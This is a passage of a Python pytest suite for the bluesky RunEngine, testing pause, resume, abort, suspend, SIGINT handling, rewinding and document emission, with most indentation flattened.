with pytest.raises(TransitionError):
RE.stop()
def test_pausing_from_idle_state_raises(RE):
with pytest.raises(TransitionError):
RE.request_pause(defer=False)
def test_aborting_from_idle_state_raises(RE):
with pytest.raises(TransitionError):
RE.abort()
def test_register(RE):
mutable = {}
RE.verbose = True
async def func(msg):
mutable['flag'] = True
def plan():
yield Msg('custom-command')
RE.register_command('custom-command', func)
RE(plan())
assert 'flag' in mutable
# Unregister command; now the Msg should not be recognized.
RE.unregister_command('custom-command')
with pytest.raises(KeyError):
RE([Msg('custom-command')])
def test_stop_motors_and_log_any_errors(RE, hw):
# test that if stopping one motor raises an error, we can carry on
stopped = {}
def stop(self, *, success=False):
stopped[self.name] = True
def stop_encounters_error(self, *, success=False):
stopped[self.name] = True
raise Exception
motor = hw.motor1
broken_motor = hw.motor2
motor.stop = types.MethodType(stop, motor)
broken_motor.stop = types.MethodType(stop_encounters_error, broken_motor)
with pytest.raises(RunEngineInterrupted):
RE([Msg('set', broken_motor, 1), Msg('set', motor, 1),
Msg('pause')])
assert 'motor1' in stopped
assert 'motor2' in stopped
RE.stop()
with pytest.raises(RunEngineInterrupted):
RE([Msg('set', motor, 1), Msg('set', broken_motor, 1),
Msg('pause')])
assert 'motor1' in stopped
assert 'motor2' in stopped
RE.stop()
@requires_ophyd
def test_unstage_and_log_errors(RE):
unstaged = {}
from ophyd.sim import SynAxis
class MoverWithFlag(SynAxis):
def stage(self):
return [self]
def unstage(self):
unstaged[self.name] = True
return [self]
class BrokenMoverWithFlag(SynAxis):
def stage(self):
return [self]
def unstage(self):
unstaged[self.name] = True
return [self]
a = MoverWithFlag(name='a')
b = BrokenMoverWithFlag(name='b')
unstaged.clear()
RE([Msg('stage', a), Msg('stage', b)])
assert 'a' in unstaged
assert 'b' in unstaged
unstaged.clear()
RE([Msg('stage', b), Msg('stage', a)])
assert 'a' in unstaged
assert 'b' in unstaged
def test_open_run_twice_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('open_run')])
def test_saving_without_an_open_bundle_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('save')])
def test_dropping_without_an_open_bundle_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('drop')])
def test_opening_a_bundle_without_a_run_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('create', name='primary')])
def test_checkpoint_inside_a_bundle_is_illegal(RE):
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('create', name='primary'), Msg('checkpoint')])
def test_redundant_monitors_are_illegal(RE):
class Dummy:
def __init__(self, name):
self.name = name
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe(self):
return {}
def subscribe(self, *args, **kwargs):
pass
def clear_sub(self, *args, **kwargs):
pass
dummy = Dummy('dummy')
with pytest.raises(IllegalMessageSequence):
RE([Msg('open_run'), Msg('monitor', dummy),
Msg('monitor', dummy)])
# Monitoring, unmonitoring, and monitoring again is legal.
RE([Msg('open_run'), Msg('monitor', dummy), Msg('unmonitor', dummy),
Msg('monitor', dummy)])
# Monitoring outside a run is illegal.
with pytest.raises(IllegalMessageSequence):
RE([Msg('monitor', dummy)])
# Unmonitoring something that was never monitored is illegal.
with pytest.raises(IllegalMessageSequence):
RE([Msg('unmonitor', dummy)])
def test_empty_bundle(RE, hw):
mutable = {}
def cb(name, doc):
mutable['flag'] = True
# In this case, an Event should be emitted.
mutable.clear()
RE([Msg('open_run'), Msg('create', name='primary'), Msg('read', hw.det), Msg('save')],
{'event': cb})
assert 'flag' in mutable
    # In this case, an Event should not be emitted because the bundle is
    # empty (i.e., there are no readings).
mutable.clear()
RE([Msg('open_run'), Msg('create', name='primary'), Msg('save')], {'event': cb})
assert 'flag' not in mutable
def test_dispatcher_unsubscribe_all(RE):
def count_callbacks(RE):
return sum([len(cbs) for cbs in
RE.dispatcher.cb_registry.callbacks.values()])
def cb(name, doc):
pass
RE.subscribe(cb)
assert count_callbacks(RE) == len(DocumentNames)
RE.dispatcher.unsubscribe_all()
assert count_callbacks(RE) == 0
def test_stage_and_unstage_are_optional_methods(RE):
class Dummy:
pass
dummy = Dummy()
RE([Msg('stage', dummy), Msg('unstage', dummy)])
def test_pause_resume_devices(RE):
paused = {}
resumed = {}
class Dummy:
def __init__(self, name):
self.name = name
def pause(self):
paused[self.name] = True
def resume(self):
resumed[self.name] = True
dummy = Dummy('dummy')
with pytest.raises(RunEngineInterrupted):
RE([Msg('stage', dummy), Msg('pause')])
RE.resume()
assert 'dummy' in paused
assert 'dummy' in resumed
def test_bad_call_args(RE):
with pytest.raises(Exception):
RE(53)
assert RE.state == 'idle'
def test_record_interruptions(RE):
docs = defaultdict(lambda: [])
def collect(name, doc):
print("HI", name)
docs[name].append(doc)
print(docs)
RE.subscribe(collect)
RE.ignore_callback_exceptions = False
RE.msg_hook = print
# The 'pause' inside the run should generate an event iff
# record_interruptions is True.
plan = [Msg('pause'), Msg('open_run'), Msg('pause'), Msg('close_run')]
assert not RE.record_interruptions
with pytest.raises(RunEngineInterrupted):
RE(plan)
with pytest.raises(RunEngineInterrupted):
RE.resume()
RE.resume()
assert len(docs['descriptor']) == 0
assert len(docs['event']) == 0
RE.record_interruptions = True
with pytest.raises(RunEngineInterrupted):
RE(plan)
with pytest.raises(RunEngineInterrupted):
RE.resume()
RE.resume()
assert len(docs['descriptor']) == 1
assert len(docs['event']) == 2
    assert docs['event'][0]['data']['interruption'] == 'pause'
    assert docs['event'][1]['data']['interruption'] == 'resume'
@requires_ophyd
def _make_unrewindable_marker():
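    # Build a parametrize marker pairing the same plan with a detector whose
    # pause() raises NoReplayAllowed and with an ordinary detector, together
    # with the message sequence expected after a pause/resume in each case.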
from ophyd.sim import SynGauss, SynAxis
class UnReplayableSynGauss(SynGauss):
def pause(self):
raise NoReplayAllowed()
motor = SynAxis(name='motor')
def test_plan(motor, det):
yield Msg('set', motor, 0)
yield Msg('trigger', det)
yield Msg('pause')
yield Msg('set', motor, 1)
yield Msg('trigger', det)
inps = []
inps.append((test_plan,
motor,
UnReplayableSynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'pause', 'set', 'trigger']))
inps.append((test_plan,
motor,
SynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'pause',
'set', 'trigger', 'set', 'trigger']))
return pytest.mark.parametrize('plan,motor,det,msg_seq', inps)
@_make_unrewindable_marker()
def test_unrewindable_det(RE, plan, motor, det, msg_seq):
msgs = []
def collector(msg):
msgs.append(msg)
RE.msg_hook = collector
with pytest.raises(RunEngineInterrupted):
RE(plan(motor, det))
RE.resume()
assert [m.command for m in msgs] == msg_seq
@requires_ophyd
def _make_unrewindable_suspender_marker():
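    # Same idea as above, but the interruption comes from a suspension
    # requested during the plan's sleep rather than an explicit 'pause' message.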
from ophyd.sim import SynGauss, SynAxis
class UnReplayableSynGauss(SynGauss):
def pause(self):
raise NoReplayAllowed()
motor = SynAxis(name='motor')
def test_plan(motor, det):
yield Msg('set', motor, 0)
yield Msg('trigger', det)
yield Msg('sleep', None, 1)
yield Msg('set', motor, 0)
yield Msg('trigger', det)
inps = []
inps.append((test_plan,
motor,
UnReplayableSynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'sleep',
'rewindable', 'wait_for', 'resume', 'rewindable',
'set', 'trigger']))
inps.append((test_plan,
motor,
SynGauss('det', motor, 'motor', center=0, Imax=1),
['set', 'trigger', 'sleep',
'rewindable', 'wait_for', 'resume', 'rewindable',
'set',
'trigger', 'sleep', 'set', 'trigger']))
return pytest.mark.parametrize('plan,motor,det,msg_seq', inps)
@_make_unrewindable_suspender_marker()
def test_unrewindable_det_suspend(RE, plan, motor, det, msg_seq):
from bluesky.utils import ts_msg_hook
msgs = []
loop = RE.loop
def collector(msg):
ts_msg_hook(msg)
msgs.append(msg)
RE.msg_hook = collector
ev = _fabricate_asycio_event(loop)
threading.Timer(.5, RE.request_suspend,
kwargs=dict(fut=ev.wait)).start()
def verbose_set():
        print('setting')
ev.set()
loop.call_soon_threadsafe(
loop.call_later, 1, verbose_set)
RE(plan(motor, det))
assert [m.command for m in msgs] == msg_seq
@pytest.mark.parametrize('unpause_func', [lambda RE: RE.stop(),
lambda RE: RE.abort(),
lambda RE: RE.resume()])
def test_cleanup_after_pause(RE, unpause_func, hw):
motor = hw.motor
motor.set(1024)
@reset_positions_decorator()
def simple_plan(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('pause')
for j in range(15):
yield Msg('set', motor, -j)
with pytest.raises(RunEngineInterrupted):
RE(simple_plan(motor))
assert motor.position == 14
unpause_func(RE)
assert motor.position == 1024
@pytest.mark.parametrize('unpause_func,excp',
[(lambda RE: RE.stop(), RequestStop),
(lambda RE: RE.abort(), RequestAbort),
(lambda RE: RE.halt(), GeneratorExit)])
def test_exit_raise(RE, unpause_func, excp):
flag = False
@reset_positions_decorator()
def simple_plan():
nonlocal flag
try:
yield from checkpoint()
yield Msg('pause')
except excp:
flag = True
with pytest.raises(RunEngineInterrupted):
RE(simple_plan())
unpause_func(RE)
assert flag
@pytest.mark.skipif(
os.environ.get('TRAVIS', None) == 'true' and sys.platform == 'darwin',
reason=("The file-descriptor wake up based signal handling "
"does not work on travis on OSX"))
def test_sigint_three_hits(RE, hw):
import time
motor = hw.motor
motor.delay = .5
pid = os.getpid()
def sim_kill(n):
for j in range(n):
time.sleep(.05)
os.kill(pid, signal.SIGINT)
lp = RE.loop
motor.loop = lp
def self_sig_int_plan():
threading.Timer(.05, sim_kill, (3,)).start()
yield from abs_set(motor, 1, wait=True)
start_time = ttime.time()
with pytest.raises(RunEngineInterrupted):
RE(finalize_wrapper(self_sig_int_plan(),
abs_set(motor, 0, wait=True)))
end_time = ttime.time()
# not enough time for motor to cleanup, but long enough to start
assert 0.05 < end_time - start_time < 0.2
RE.abort() # now cleanup
done_cleanup_time = ttime.time()
# this should be 0.5 (the motor.delay) above, leave sloppy for CI
assert 0.3 < done_cleanup_time - end_time < 0.6
@pytest.mark.skipif(sys.version_info < (3, 5),
reason="requires python3.5")
def test_sigint_many_hits_pln(RE):
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL', j)
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
def hanging_plan():
"a plan that blocks the RunEngine's normal Ctrl+C handing with a sleep"
for j in range(100):
ttime.sleep(.1)
yield Msg('null')
start_time = ttime.time()
timer = threading.Timer(0.2, sim_kill, (11,))
timer.start()
with pytest.raises(RunEngineInterrupted):
RE(hanging_plan())
# Check that hammering SIGINT escaped from that 10-second sleep.
assert ttime.time() - start_time < 2
# The KeyboardInterrupt will have been converted to a hard pause.
assert RE.state == 'idle'
def test_sigint_many_hits_panic(RE):
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL', j, ttime.monotonic() - start_time)
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
def hanging_plan():
"a plan that blocks the RunEngine's normal Ctrl+C handing with a sleep"
yield Msg('null')
ttime.sleep(5)
yield Msg('null')
start_time = ttime.monotonic()
timer = threading.Timer(0.2, sim_kill, (11,))
timer.start()
with pytest.raises(RunEngineInterrupted):
RE(hanging_plan())
# Check that hammering SIGINT escaped from that 5-second sleep.
assert (ttime.monotonic() - start_time) < 2.5
    # The KeyboardInterrupt arrived, but because the RunEngine could not shut
    # down cleanly, it panics.
assert RE.state == 'panicked'
with pytest.raises(RuntimeError):
RE([])
with pytest.raises(RuntimeError):
RE.stop()
with pytest.raises(RuntimeError):
RE.halt()
with pytest.raises(RuntimeError):
RE.abort()
with pytest.raises(RuntimeError):
RE.resume()
with pytest.raises(RuntimeError):
RE.request_pause()
@pytest.mark.skipif(sys.version_info < (3, 5),
reason="requires python3.5")
def test_sigint_many_hits_cb(RE):
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL')
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
@run_decorator()
def infinite_plan():
while True:
yield Msg('null')
def hanging_callback(name, doc):
for j in range(100):
ttime.sleep(.1)
start_time = ttime.time()
timer = threading.Timer(0.2, sim_kill, (11,))
timer.start()
with pytest.raises(RunEngineInterrupted):
RE(infinite_plan(), {'start': hanging_callback})
# Check that hammering SIGINT escaped from that 10-second sleep.
assert ttime.time() - start_time < 2
# The KeyboardInterrupt will have been converted to a hard pause.
assert RE.state == 'idle'
def test_no_context_manager(RE):
# Clear the context managers so that RE will not react to sigint
RE.context_managers = []
# Proceed as normal
pid = os.getpid()
def sim_kill(n=1):
for j in range(n):
print('KILL', j)
ttime.sleep(0.05)
os.kill(pid, signal.SIGINT)
def hanging_plan():
"a plan that blocks the RunEngine's normal Ctrl+C handing with a sleep"
ttime.sleep(2)
yield Msg('null')
# Only send one SIGINT
timer = threading.Timer(0.5, sim_kill, (1,))
timer.start()
    t = threading.Thread(target=RE, args=(hanging_plan(),))
start = ttime.time()
t.start()
# Wait for the KeyboardInterrupt and handle in the main thread
with pytest.raises(KeyboardInterrupt):
ttime.sleep(5)
t.join()
delta = ttime.time() - start
# Hanging plan finished, but extra sleep did not
assert 2 < delta < 5
def test_many_context_managers(RE):
class Manager:
enters = 0
exits = 0
def __init__(self, RE):
pass
def __enter__(self):
Manager.enters += 1
def __exit__(self, *args, **kwargs):
Manager.exits += 1
n = 42
RE.context_managers.extend([Manager]*n)
RE([Msg('null')])
assert Manager.enters == n
assert Manager.exits == n
def _make_plan_marker():
@reset_positions_decorator()
def raiser(motor):
for j in range(15):
yield Msg('set', motor, j)
raise RuntimeError()
@reset_positions_decorator()
def pausing_raiser(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('pause')
raise RuntimeError()
@reset_positions_decorator()
def bad_set(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('set', None, j)
@reset_positions_decorator()
def bad_msg(motor):
for j in range(15):
yield Msg('set', motor, j)
yield Msg('aardvark')
@reset_positions_decorator()
def cannot_pauser(motor):
yield Msg('clear_checkpoint')
for j in range(15):
yield Msg('set', motor, j)
yield Msg('pause')
return pytest.mark.parametrize('plan', [raiser, bad_set, bad_msg,
pausing_raiser, cannot_pauser])
@_make_plan_marker()
def test_cleanup_pathological_plans(RE, hw, plan):
motor = hw.motor
motor.set(1024)
try:
try:
RE(plan(motor))
except RunEngineInterrupted:
pass
if RE.state == 'paused':
assert motor.position != 1024
RE.resume()
except Exception:
pass
assert motor.position == 1024
def test_finalizer_closeable():
pre = (j for j in range(18))
post = (j for j in range(18))
plan = finalize_wrapper(pre, post)
for j in range(3):
next(plan)
plan.close()
def test_invalid_generator(RE, hw, capsys):
motor = hw.motor
from bluesky.utils import ts_msg_hook
RE.msg_hook = ts_msg_hook
# this is not a valid generator as it will try to yield if it
# is throw a GeneratorExit
def patho_finalize_wrapper(plan, post):
try:
yield from plan
finally:
yield from post
def base_plan(motor):
for j in range(5):
yield Msg('set', motor, j * 2 + 1)
yield Msg('pause')
def post_plan(motor):
yield Msg('set', motor, 500)
def pre_suspend_plan():
yield Msg('set', motor, -500)
raise GeneratorExit('this one')
def make_plan():
return patho_finalize_wrapper(base_plan(motor),
post_plan(motor))
with pytest.raises(RunEngineInterrupted):
RE(make_plan())
RE.request_suspend(None, pre_plan=pre_suspend_plan())
capsys.readouterr()
try:
RE.resume()
except ValueError as sf:
assert sf.__cause__.args[0] == 'this one'
actual_err, _ = capsys.readouterr()
expected_prefix = 'The plan '
expected_postfix = (' tried to yield a value on close. '
'Please fix your plan.\n')[::-1]
assert actual_err[:len(expected_prefix)] == expected_prefix
assert actual_err[::-1][:len(expected_postfix)] == expected_postfix
def test_exception_cascade_REside(RE):
except_hit = False
def pausing_plan():
nonlocal except_hit
for j in range(5):
yield Msg('null')
try:
yield Msg('pause')
except Exception:
except_hit = True
raise
def pre_plan():
yield Msg('aardvark')
def post_plan():
for j in range(5):
yield Msg('null')
with pytest.raises(RunEngineInterrupted):
RE(pausing_plan())
ev = _fabricate_asycio_event(RE.loop)
ev.set()
RE.request_suspend(ev.wait, pre_plan=pre_plan())
with pytest.raises(KeyError):
RE.resume()
assert except_hit
def test_exception_cascade_planside(RE):
except_hit = False
def pausing_plan():
nonlocal except_hit
for j in range(5):
yield Msg('null')
try:
yield Msg('pause')
except Exception:
except_hit = True
raise
def pre_plan():
yield Msg('null')
raise RuntimeError()
def post_plan():
for j in range(5):
yield Msg('null')
with pytest.raises(RunEngineInterrupted):
RE(pausing_plan())
ev = _fabricate_asycio_event(RE.loop)
ev.set()
RE.request_suspend(ev.wait, pre_plan=pre_plan())
with pytest.raises(RuntimeError):
RE.resume()
assert except_hit
def test_sideband_cancel(RE):
loop = RE.loop
ev = _fabricate_asycio_event(RE.loop)
def done():
ev.set()
def side_band_kill():
RE.loop.call_soon_threadsafe(RE._task.cancel)
scan = [Msg('wait_for', None, [ev.wait, ]), ]
assert RE.state == 'idle'
start = ttime.time()
threading.Timer(.5, side_band_kill).start()
loop.call_soon_threadsafe(
loop.call_later, 2, done)
RE(scan)
assert RE.state == 'idle'
assert RE._task.cancelled()
stop = ttime.time()
assert .5 < (stop - start) < 2
def test_no_rewind(RE):
msg_lst = []
def msg_collector(msg):
msg_lst.append(msg)
RE.rewindable = False
plan = [Msg('null')] * 3 + [Msg('pause')] + [Msg('null')] * 3
RE.msg_hook = msg_collector
with pytest.raises(RunEngineInterrupted):
RE(plan)
RE.resume()
assert msg_lst == plan
def test_no_rewindable_msg(RE):
RE.rewindable = True
msg_lst = []
def msg_collector(msg):
msg_lst.append(msg)
plan = ([Msg('null')] * 3 +
[Msg('pause'), Msg('rewindable', None, False)] +
[Msg('null')] * 3)
RE.msg_hook = msg_collector
with pytest.raises(RunEngineInterrupted):
RE(plan)
RE.resume()
assert msg_lst[:4] == plan[:4]
assert msg_lst[4:7] == plan[:3]
assert msg_lst[7:] == plan[4:]
@pytest.mark.parametrize('start_state', [True, False])
def test_rewindable_state_retrieval(RE, start_state):
RE.rewindable = start_state
def rewind_plan(start_value):
ret = yield Msg('rewindable', None, None)
assert ret is start_state
cache_state = ret
ret = yield Msg('rewindable', None, start_state)
assert ret is start_state
ret = yield Msg('rewindable', None, not start_state)
assert ret is (not start_state)
ret = yield Msg('rewindable', None, cache_state)
assert ret is start_state
RE(rewind_plan(start_state))
assert RE.rewindable is start_state
@pytest.mark.parametrize('start_state,msg_seq', ((True, ['open_run',
'rewindable',
'rewindable',
'trigger',
'trigger',
'wait',
'create',
'read',
'read',
'save',
'rewindable',
'close_run']),
(False, ['open_run',
'rewindable',
'trigger',
'trigger',
'wait',
'create',
'read',
'read',
'save',
'close_run'])))
def test_nonrewindable_detector(RE, hw, start_state, msg_seq):
class FakeSig:
def get(self):
return False
hw.det.rewindable = FakeSig()
RE.rewindable = start_state
m_col = MsgCollector()
RE.msg_hook = m_col
RE(run_wrapper(trigger_and_read([hw.motor, hw.det])))
assert [m.command for m in m_col.msgs] == msg_seq
@pytest.mark.parametrize('start_state,msg_seq', ((True,
['rewindable',
'rewindable',
'aardvark',
'rewindable']),
(False, ['rewindable',
'aardvark'])))
def test_nonrewindable_finalizer(RE, hw, start_state, msg_seq):
class FakeSig:
def get(self):
return False
det = hw.det
det.rewindable = FakeSig()
RE.rewindable = start_state
m_col = MsgCollector()
RE.msg_hook = m_col
def evil_plan():
assert RE.rewindable is False
yield Msg('aardvark')
with pytest.raises(KeyError):
RE(rewindable_wrapper(evil_plan(), False))
assert RE.rewindable is start_state
assert [m.command for m in m_col.msgs] == msg_seq
def test_halt_from_pause(RE):
except_hit = False
m_coll = MsgCollector()
RE.msg_hook = m_coll
def pausing_plan():
nonlocal except_hit
for j in range(5):
yield Msg('null')
try:
yield Msg('pause')
except Exception:
yield Msg('null')
except_hit = True
raise
with pytest.raises(RunEngineInterrupted):
RE(pausing_plan())
RE.halt()
assert not except_hit
assert [m.command for m in m_coll.msgs] == ['null'] * 5 + ['pause']
def test_halt_async(RE):
except_hit = False
m_coll = MsgCollector()
RE.msg_hook = m_coll
def sleeping_plan():
nonlocal except_hit
try:
yield Msg('sleep', None, 50)
except Exception:
yield Msg('null')
except_hit = True
raise
threading.Timer(.1, RE.halt).start()
start = ttime.time()
with pytest.raises(RunEngineInterrupted):
RE(sleeping_plan())
stop = ttime.time()
assert .09 < stop - start < 5
assert not except_hit
assert [m.command for m in m_coll.msgs] == ['sleep']
@pytest.mark.parametrize('cancel_func',
[lambda RE: RE.stop(), lambda RE: RE.abort(),
lambda RE: RE.request_pause(defer=False)])
def test_prompt_stop(RE, cancel_func):
except_hit = False
m_coll = MsgCollector()
RE.msg_hook = m_coll
def sleeping_plan():
nonlocal except_hit
try:
yield Msg('sleep', None, 50)
except Exception:
yield Msg('null')
except_hit = True
raise
threading.Timer(.1, partial(cancel_func, RE)).start()
start = ttime.time()
with pytest.raises(RunEngineInterrupted):
RE(sleeping_plan())
stop = ttime.time()
if RE.state != 'idle':
RE.abort()
assert 0.09 < stop - start < 5
assert except_hit
assert [m.command for m in m_coll.msgs] == ['sleep', 'null']
@pytest.mark.parametrize('change_func', [lambda RE: RE.stop(),
lambda RE: RE.abort(),
lambda RE: RE.halt(),
lambda RE: RE.request_pause(),
lambda RE: RE.request_pause(defer=True),
lambda RE: RE.resume()])
def test_bad_from_idle_transitions(RE, change_func):
with pytest.raises(TransitionError):
change_func(RE)
def test_empty_cache_pause(RE):
RE.rewindable = False
pln = [Msg('open_run'),
Msg('create', name='primary'),
Msg('pause'),
Msg('save'),
Msg('close_run')]
with pytest.raises(RunEngineInterrupted):
RE(pln)
RE.resume()
def test_state_hook(RE):
states = []
def log_state(new, old):
states.append((new, old))
RE.state_hook = log_state
with pytest.raises(RunEngineInterrupted):
RE([Msg('open_run'), Msg('pause'), Msg('close_run')])
RE.resume()
expected = [('running', 'idle'),
('pausing', 'running'),
('paused', 'pausing'),
('running', 'paused'),
('idle', 'running')]
assert states == expected
def test_max_depth(RE):
    assert RE.max_depth is None
RE([]) # should not raise
# assume test framework needs less than 100 stacks... haha
RE.max_depth = 100
RE([]) # should not raise
RE.max_depth = 0
with pytest.raises(RuntimeError):
RE([])
def test_preprocessors(RE):
def custom_cleanup(plan):
yield from plan
yield Msg('null', 'cleanup') # just a sentinel
def my_sub(name, doc):
pass
def custom_subs(plan):
yield from subs_wrapper(plan, my_sub)
RE.preprocessors = [custom_cleanup, custom_subs]
actual = []
RE.msg_hook = lambda msg: actual.append(msg)
RE([Msg('null')])
print(actual)
expected = [Msg('subscribe', None, my_sub, 'all'),
Msg('null'),
Msg('null', 'cleanup'),
Msg('unsubscribe', None, token=0)]
assert actual == expected
@requires_ophyd
def test_pardon_failures(RE):
from ophyd import StatusBase
st = StatusBase()
class Dummy:
name = 'dummy'
def set(self, val):
return st
dummy = Dummy()
RE([Msg('set', dummy, 1)])
st._finished(success=False)
RE([Msg('null')])
@requires_ophyd
def test_failures_kill_run(RE):
# just to make sure that 'pardon_failures' does not block *real* failures
from ophyd import StatusBase
class Dummy:
name = 'dummy'
def set(self, val):
st = StatusBase()
st._finished(success=False)
return st
dummy = Dummy()
with pytest.raises(FailedStatus):
RE([Msg('set', dummy, 1, group='test'),
Msg('wait', group='test')])
def test_colliding_streams(RE, hw):
collector = {'primary': [], 'baseline': []}
descs = {}
def local_cb(name, doc):
if name == 'descriptor':
descs[doc['uid']] = doc['name']
elif name == 'event':
collector[descs[doc['descriptor']]].append(doc)
RE(baseline_wrapper(grid_scan([hw.motor],
hw.motor, -1, 1, 5,
hw.motor1, -5, 5, 7, True),
[hw.motor, hw.motor1]),
local_cb)
assert len(collector['primary']) == 35
assert len(collector['baseline']) == 2
assert list(range(1, 36)) == [e['seq_num'] for e in collector['primary']]
assert list(range(1, 3)) == [e['seq_num'] for e in collector['baseline']]
def test_old_subscribe(RE):
# Old usage had reversed argument order. It should warn but still work.
collector = []
def collect(name, doc):
collector.append(doc)
with pytest.warns(UserWarning):
RE.subscribe('all', collect)
RE([Msg('open_run'), Msg('close_run')])
assert len(collector) == 2
RE.unsubscribe(0)
with pytest.warns(UserWarning):
RE.subscribe('start', collect)
RE([Msg('open_run'), Msg('close_run')])
assert len(collector) == 3
RE.unsubscribe(1)
def test_waiting_hook(RE, hw):
collector = []
def collect(sts):
collector.append(sts)
RE.waiting_hook = collect
RE([Msg('set', hw.motor, 5, group='A'), Msg('wait', group='A')])
sts, none = collector
assert isinstance(sts, set)
assert len(sts) == 1
assert none is None
collector.clear()
RE([Msg('set', hw.motor1, 5, group='A'),
Msg('set', hw.motor2, 3, group='A'),
Msg('wait', group='A')])
sts, none = collector
assert isinstance(sts, set)
assert len(sts) == 2
assert none is None
collector.clear()
def test_hints(RE):
class Detector:
def __init__(self, name):
self.name = name
self.parent = None
self.hints = {'vis': 'placeholder'}
def read(self):
return {}
def describe(self):
return {}
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
det = Detector('det')
collector = []
RE(count([det]),
{'descriptor': lambda name, doc: collector.append(doc)})
doc = collector.pop()
assert doc['hints']['det'] == {'vis': 'placeholder'}
def test_filled(RE, hw, db):
collector = []
def collect(name, doc):
if name == 'event':
collector.append(doc)
RE(count([hw.det]), collect)
event, = collector
assert event['filled'] == {}
collector.clear()
RE(count([hw.img]), collect)
event, = collector
assert event['filled'] == {'img': False}
def test_double_call(RE):
uid1 = RE(count([]))
uid2 = RE(count([]))
assert uid1 != uid2
def test_num_events(RE, hw, db):
RE.subscribe(db.insert)
rs1 = RE(count([]))
if RE._call_returns_result:
uid1 = rs1.run_start_uids[0]
else:
uid1 = rs1[0]
h = db[uid1]
assert h.stop['num_events'] == {}
rs2 = RE(count([hw.det], 5))
if RE._call_returns_result:
uid2 = rs2.run_start_uids[0]
else:
uid2 = rs2[0]
h = db[uid2]
assert h.stop['num_events'] == {'primary': 5}
sd = SupplementalData(baseline=[hw.det])
RE.preprocessors.append(sd)
rs3 = RE(count([]))
if RE._call_returns_result:
uid3 = rs3.run_start_uids[0]
else:
uid3 = rs3[0]
h = db[uid3]
assert h.stop['num_events'] == {'baseline': 2}
rs4 = RE(count([hw.det], 5))
if RE._call_returns_result:
uid4 = rs4.run_start_uids[0]
else:
uid4 = rs4[0]
h = db[uid4]
assert h.stop['num_events'] == {'primary': 5, 'baseline': 2}
def test_raise_if_interrupted_deprecation(RE):
with pytest.warns(UserWarning):
RE([], raise_if_interrupted=True)
@pytest.mark.parametrize('bail_func,status', (('resume', 'success'),
('stop', 'success'),
('abort', 'abort'),
('halt', 'abort')))
def test_force_stop_exit_status(bail_func, status, RE):
d = DocCollector()
RE.subscribe(d.insert)
@run_decorator()
def bad_plan():
print('going in')
yield Msg('pause')
with pytest.raises(RunEngineInterrupted):
RE(bad_plan())
rs = getattr(RE, bail_func)()
if RE._call_returns_result:
if bail_func == "resume":
assert rs.plan_result is not RE.NO_PLAN_RETURN
else:
assert rs.plan_result is RE.NO_PLAN_RETURN
uid = rs.run_start_uids[0]
assert rs.exit_status == status
else:
uid = rs[0]
assert len(d.start) == 1
assert d.start[0]['uid'] == uid
assert len(d.stop) == 1
assert d.stop[uid]['exit_status'] == status
def test_exceptions_exit_status(RE):
d = DocCollector()
RE.subscribe(d.insert)
class Snowflake(Exception):
...
@run_decorator()
def bad_plan():
yield Msg('null')
raise Snowflake('boo')
with pytest.raises(Snowflake) as sf:
RE(bad_plan())
assert len(d.start) == 1
rs = d.start[0]['uid']
assert len(d.stop) == 1
assert d.stop[rs]['exit_status'] == 'fail'
assert d.stop[rs]['reason'] == str(sf.value)
def test_plan_return(RE):
if not RE._call_returns_result:
pytest.skip()
def test_plan():
yield Msg('null')
return 'plan_result'
rs = RE(test_plan())
assert rs.plan_result == "plan_result"
assert rs.exit_status == "success"
assert rs.interrupted is False
def test_plan_return_resume(RE):
if not RE._call_returns_result:
pytest.skip()
def test_plan():
yield Msg('null')
yield Msg('pause')
return 'plan_result'
with pytest.raises(RunEngineInterrupted):
RE(test_plan())
rs = RE.resume()
assert rs.plan_result == "plan_result"
assert rs.exit_status == "success"
def test_drop(RE, hw):
det = hw.det
def inner(msg):
yield Msg('create', name='primary')
yield Msg('read', det)
yield Msg(msg)
# Drop first, drop after saving, save after dropping
def plan():
yield Msg('open_run')
yield from inner('drop')
yield from inner('save')
yield from inner('drop')
yield from inner('save')
yield from inner('save')
yield Msg('close_run')
docs = defaultdict(list)
def collector(name, doc):
docs[name].append(doc)
RE(plan(), collector)
assert len(docs['event']) == 3
def test_failing_describe_callback(RE, hw):
class TestException(Exception):
pass
det = hw.det
det2 = hw.det2
def evil_cb(name, doc):
if any(k in doc['data_keys'] for k in det.describe()):
raise TestException
RE.subscribe(evil_cb, 'descriptor')
def plan():
yield Msg('open_run')
try:
yield Msg('create', name='primary')
yield Msg('read', det)
yield Msg('save')
finally:
yield Msg('create', name='primary')
yield Msg('read', det2)
yield Msg('save')
yield Msg('close_run')
with pytest.raises(TestException):
RE(plan())
def test_print_commands(RE):
    '''Test the printing of the available commands.
    NOTE: An error here likely just means that this interface has changed,
    and you'll likely want to update the test.
    (A test here is still a good idea, since it at least raises awareness
    when a change breaks the existing API.)
    '''
# testing the commands list
commands1 = list(RE._command_registry.keys())
commands2 = RE.commands
assert commands1 == commands2
# testing print commands
# copy and paste most of the code...
verbose = False
print_command_reg1 = "List of available commands\n"
for command, func in RE._command_registry.items():
docstring = func.__doc__
if verbose is False:
docstring = docstring.split("\n")[0]
print_command_reg1 = print_command_reg1 +\
"{} : {}\n".format(command, docstring)
print_command_reg2 = RE.print_command_registry()
assert print_command_reg1 == print_command_reg2
def test_broken_read_exception(RE):
class Dummy:
def __init__(self, name):
self.name = name
def read_configuration(self):
return {}
def describe_configuration(self):
return {}
def describe(self):
return {}
